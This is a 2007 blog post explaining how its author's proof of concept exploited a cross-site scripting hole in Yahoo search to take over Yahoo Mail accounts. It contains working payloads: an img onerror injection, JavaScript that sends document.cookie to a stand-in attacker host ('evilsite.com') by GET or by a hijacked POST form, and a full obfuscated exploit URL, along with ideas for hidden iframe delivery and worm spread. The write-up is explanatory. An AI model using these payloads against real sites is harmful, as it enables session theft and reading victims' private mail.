Monday, June 25, 2007

Technical Explanation of Yahoo XSS flaw

Several days ago, I released a proof of concept (PoC) to demonstrate how to exploit a simple cross-site scripting (XSS) hole on Yahoo's web site. This PoC allowed anyone to steal a poor bastard's online identity and email. Judging from the comments on my exploit post and on the Slashdot post, the technical details are confusing to many.

XSS is both simple and complex. The idea of JavaScript injection is not very complicated to programmers, especially if they're already familiar with SQL injection. But how much damage a particular XSS hole exposes a site to, and how that hole is actually exploited, are not always clear-cut: the technical details vary, sites have different levels of protection, and tricks may be needed to overcome browser incompatibilities and other constraints.

The Trap

I'll start out with a general description of the trap set up by the exploit and why it's so easy to fall into it. By the way, the trap in my proof of concept was tested to work on all major Firefox and IE browser versions with default settings.

With the PoC as I presented it, the victim would have to somehow navigate to a somewhat suspicious-looking link, and many have criticized the exploit as less realistic because of that. But the link can be masked in a myriad of ways. You could, for instance, create a webpage http://myhotpix.com/ with a hidden iframe that automatically and silently visits the XSS URL, and voila: the user has just been hit by the XSS exploit without even knowing it or seeing any suspicious URLs. As one commenter suggested, you could insert and disguise this link on the MySpace profile of "some hot girl" (tm).

The exploit could also be made into a worm for maximal spread. When a user falls victim to it by visiting the malicious link, their account would be used to send copies of the malicious link to all their contacts at Yahoo Mail or Yahoo IM.

JavaScript Injection

Let's get into the technical details of how the exploit functions. The technique used to exploit this XSS hole is called "JavaScript injection." What you need is a vulnerable page on the target web site that takes input data from the browser, i.e. from the victim, but doesn't properly clean malicious characters out of that input. When you find a page that accepts query string parameters via the URL, or a form results page that accepts form parameters, you test it for vulnerabilities by sending unexpected input and checking whether the back-end code neglects to clean up that input before sending it back to the user's browser inside the page's HTML source.

In the case of my PoC, the form field was the "all of these words" field in Yahoo's Advanced Web Search form. By appending ?p=anything to http://search.yahoo.com/web/advanced you can see that whatever you put after ?p= shows up in the results page's textbox. Normally, Yahoo's backend is supposed to filter and escape user-generated input like this. But in this case, their input filter was not foolproof, and this is what allowed us to inject JavaScript into the page. The string which circumvented their filter was
<img src=14_invalid_crap onerror=OUR_MALICIOUS_JAVASCRIPT>
What this did was insert an img tag with an invalid src URL into the page. The image fails to load, which triggers the tag's onerror event, which in turn executes our malicious JavaScript.
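
For contrast, here is a rough sketch of the kind of output escaping that would have neutralized this input. It is only an illustration, not Yahoo's actual filter: escapeHtml and renderSearchBox are hypothetical names, the input markup is assumed, and alert(1) stands in for a real payload. The sample input starts with "> because the generated XSS URL further down starts with %22%3E, presumably to break out of the textbox's value attribute.

```javascript
// Hypothetical helper (not Yahoo's code): replace the characters that let
// text break out of an HTML attribute value or element body.
function escapeHtml(text) {
  const replacements = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  };
  return String(text).replace(/[&<>"']/g, (ch) => replacements[ch]);
}

// Hypothetical rendering of the search textbox. The parameter name "p" comes
// from the URL; the surrounding markup is an assumption.
function renderSearchBox(query) {
  return '<input type="text" name="p" value="' + escapeHtml(query) + '">';
}

// A harmless stand-in for the injected string.
const hostile = '"><img src=14 onerror=alert(1)>';
console.log(renderSearchBox(hostile));
// prints: <input type="text" name="p" value="&quot;&gt;&lt;img src=14 onerror=alert(1)&gt;">
```

Once escaped, the browser displays the input as plain text inside the textbox and never creates an img tag, so there is no onerror event to fire.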

Cross-site cookie theft

The malicious JS has only one purpose: to send the user's Yahoo cookies to the attacker. With JS you can grab all the cookies from the web site that the user is visiting by reading document.cookie. And in my PoC, the transport mechanism to send all the user's cookies to an outside site is simply an img or iframe tag inserted into the document. This tag references a URL with a query string that includes the grabbed cookies. The URL points to a CGI script on a 3rd-party web site; hence, the "cross-site" in "cross-site scripting." This CGI script is then free to do whatever it wants with these cookies, including impersonating the victim. For example, the malicious JS could be something like:
document.write('<img src="http://evilsite.com/evil.cgi?cookies='+escape(document.cookie)+'"/>')
This is the most common structure of XSS exploits, and this PoC is not much different. For a well-working portable XSS exploit, however, a few tweaks may be necessary.

In our case the Yahoo cookies were very long and exceeded Internet Explorer's maximum URL length for a GET request (interestingly, Firefox did not suffer from this limitation--its maximum length must be greater). So I used a different approach and hijacked the actual search form so that a POST request could be used instead of GET, since POST data travels in the request body and is not subject to the URL length limit. The JS to do this was very simple:
f = document.forms[0]
f.method = 'POST'
f.action = 'http://evilsite.com/evil.cgi'
f.x.value = document.cookie
f.submit()

Identity Theft

In our PoC, the CGI script on the 3rd party site happens to be written in Perl but could have been written in any server-side language. Once it reads in the value of the cookies passed on by the malicious JS, it is free to act as a web browser with these cookies set and navigate to Yahoo Mail pretending to be the victim.

What the PoC actually did for demonstration purposes was grab your latest email and display it back to you, to prove that the identity was stolen. What the CGI script could have done is use the cookies to download all your email or your address book to harvest any private information contained within your account. This is what malicious hackers do all the time with XSS holes, and it often goes unnoticed.

By the way, a few portability tweaks were necessary for the script to work with both classic Yahoo Mail and Yahoo Mail Beta.

Single Sign-On Architecture

One thing you may have noticed is that the XSS hole was found on the Yahoo search page, but the PoC attacks the victim's Yahoo Mail account. If these sites are separate, how is this possible? The answer has to do with Yahoo's single sign-on (SSO) architecture: most large web sites want all their services accessible through one login, which is normally very convenient for users as they don't have to keep logging in every time they switch from Yahoo Mail to Yahoo Photos to Yahoo IM.

However, the way that Yahoo has it set up makes things a little insecure. Other Yahoo services may differ, but at least Mail and Search are designed in the following way: the cookies needed to access both of these services are the same. In other words, if you grab the cookies using an XSS hole in one service, you can now access the other. All of Yahoo's cookies have a domain of .yahoo.com and a path of '/'. Specifically, this means that if there is some vulnerability that allows you to grab cookies on any site that matches *.yahoo.com/*, you'll be able to access all Yahoo services as that user.
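
To make the cookie scoping concrete, here is a minimal sketch of how a browser decides whether a cookie applies to a given URL. It is a simplified take on the usual domain and path matching rules, not a complete implementation. The function names are hypothetical, and mail.yahoo.com is just an illustrative hostname that I am assuming for the example.

```javascript
// Simplified domain matching: a cookie set for ".yahoo.com" applies to
// yahoo.com itself and to any host that ends in ".yahoo.com".
function domainMatches(host, cookieDomain) {
  const domain = cookieDomain.replace(/^\./, '').toLowerCase();
  const h = host.toLowerCase();
  return h === domain || h.endsWith('.' + domain);
}

// Simplified path matching: a cookie path of "/" covers every path.
function pathMatches(requestPath, cookiePath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || requestPath[cookiePath.length] === '/';
}

// Hypothetical helper: would a browser attach this cookie to this URL?
function cookieIsSent(url, cookie) {
  const { hostname, pathname } = new URL(url);
  return domainMatches(hostname, cookie.domain) && pathMatches(pathname, cookie.path);
}

// Scope described in the text: domain .yahoo.com, path '/'.
const sessionCookie = { domain: '.yahoo.com', path: '/' };

for (const url of [
  'http://search.yahoo.com/web/advanced', // the page with the XSS hole
  'http://mail.yahoo.com/',               // illustrative Mail hostname (assumption)
  'http://evilsite.com/evil.cgi',         // a 3rd-party site
]) {
  console.log(url, cookieIsSent(url, sessionCookie));
}
```

The first two URLs match and the third does not. That is why script running on the search page can read the very cookies that Mail relies on, while the 3rd-party site only gets them if the injected JS hands them over.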

XSS URL generation

The Ruby script from the proof of concept is only a utility program to generate the XSS URL one time. You would run this script (which could have been written in any language) on any of your machines and never run it again--no victim would execute that code. The XSS URL needs to be generated because it has to be in a format that circumvents whatever input filters Yahoo may have, i.e. a format that hides the fact that it contains malicious JavaScript code.

The input to the Ruby script is the location of the 3rd party web site where the CGI script resides; the output is the XSS URL that you would send to potential victims as a trap. For our PoC, since we did not actually host the malicious CGI script anywhere, there was no real XSS URL to show. But as an example, if the CGI script were hosted at http://scriptkiddies.org/youvegotmail.cgi, the Ruby script would generate the following XSS URL:

http://search.yahoo.com/web/advanced?ei=UTF-8&p=%22%3E%3Cimg%20src=14%20onerror=eval(String.fromCharCode(102,61,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,59,102,46,109,101,116,104,111,100,61,39,80,79,83,84,39,59,102,46,97,99,116,105,111,110,61,39,104,116,116,112,58,47,47,115,99,114,105,112,116,107,105,100,100,105,101,115,46,111,114,103,47,121,111,117,118,101,103,111,116,109,97,105,108,46,99,103,105,39,59,102,46,120,46,118,97,108,117,101,61,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,102,46,115,117,98,109,105,116,40,41))%3E&y=Search&fr=yfp-t-501

The decimal numbers are simply the ASCII values of each character of the JavaScript code. The String.fromCharCode() function converts the masked characters back into JavaScript source that the victim's browser can interpret. The eval() call is needed to actually run that source: the onerror handler's first pass only evaluates String.fromCharCode(), which returns a string, and eval() then executes that string as code. This little roundabout choreography adds up to a dance around Yahoo's input filters. I suspect that in the future fromCharCode will be added to many websites' input filters, as it is a very common ingredient of XSS exploits.
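
The encoding step itself is easy to see in isolation. The sketch below is not the Ruby script from the PoC; it is a small illustration with hypothetical helper names (toCharCodes, fromCharCodes) that turns one fragment of the JS above into its list of character codes and back again.

```javascript
// Hypothetical helper: turn a string into a comma-separated list of the
// decimal character codes of its characters.
function toCharCodes(source) {
  return source.split('').map((ch) => ch.charCodeAt(0)).join(',');
}

// Hypothetical helper: the reverse step, which is what String.fromCharCode()
// does inside the victim's browser.
function fromCharCodes(list) {
  return String.fromCharCode(...list.split(',').map(Number));
}

const snippet = "f.method='POST'";
const encoded = toCharCodes(snippet);

console.log(encoded);
// prints: 102,46,109,101,116,104,111,100,61,39,80,79,83,84,39
console.log(fromCharCodes(encoded));
// prints: f.method='POST'
```

You can spot that same run of numbers inside the XSS URL above. Note that the encoded form contains no quotes or other JavaScript punctuation beyond digits and commas, which is presumably what let it slip past the filter.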

- Rarely Greys <rarely.greys at (Google's mail)>